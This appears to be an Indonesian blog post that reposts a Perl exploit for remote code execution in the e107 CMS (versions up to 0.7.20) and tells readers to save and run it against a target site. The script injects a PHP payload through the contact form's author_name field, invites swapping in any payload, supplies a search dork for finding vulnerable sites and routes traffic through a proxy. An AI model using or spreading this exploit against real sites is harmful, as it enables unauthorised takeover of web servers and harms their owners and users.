e107 Remote Code Execution + Scanner

Berikut ini adalah Exploitnya, copy dan simpan di file bernama: “e107-adiekonoe.pl” Tanpa tanda Kutip, ingat tanpa tanda kutip yah....

Langsung saja : Copykan Source ini

# Exploit Title: e107 Code Exec
# Date: 05/22/10
# Author: McFly@e107.org
# Software Link: http://e107.org/edownload.php
# Version: e107 <= 0.7.20 # Tested on: Linux/Windows #!/usr/bin/perl -w ################################################# # e107 Code Exec // SploitAuthor: McFly@e107.org ################################################# # These scrubs still haven't released an update! # Here is a little bit of motivation for them to # patch one of the most popular, and insecure of # the PHP web apps available today. ################################################# # DORK: inurl:e107_plugins ################################################# use LWP::UserAgent; my $path = $ARGV[0] or die("Gunakan Perintah: perl e107-adiekonoe.pl http://e107site/pathto/contact.php\n"); my $load = 'passthru(chr(105).chr(100))'; # Simple 'id' command. Put ur PHP payload here! # Remove comment for proxy support my $proxy = 'http://127.0.0.1:8118/'; $ENV{http_proxy} = $proxy ? $proxy: 0; $ua = new LWP::UserAgent; $ua->agent("Mozilla/5.0");
if ( $proxy )
{
print "[*] Using proxy $proxy \n";
$ua->env_proxy('1');
}
my $req = new HTTP::Request POST => $path;
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=%5Bphp%5D$load%3Bdie%28%29%3B%5B%2Fphp%5D");
my $res = $ua->request($req);
my $data = $res->as_string;
if ( $data =~ /(.*)/ )
{
$data = $1;
print "$data\n";
}
else
{
print "$data\n";
}

Setelah code tersebut dibuat, maka jalankan di directory active run perl shell / command prompt anda dengan dengan perintah: perl e107-adie-konoe.pl

Sumber : http://www.targetanda.com/pathnya/contact.php


Free Template Blogger collection template Hot Deals BERITA_wongANteng SEO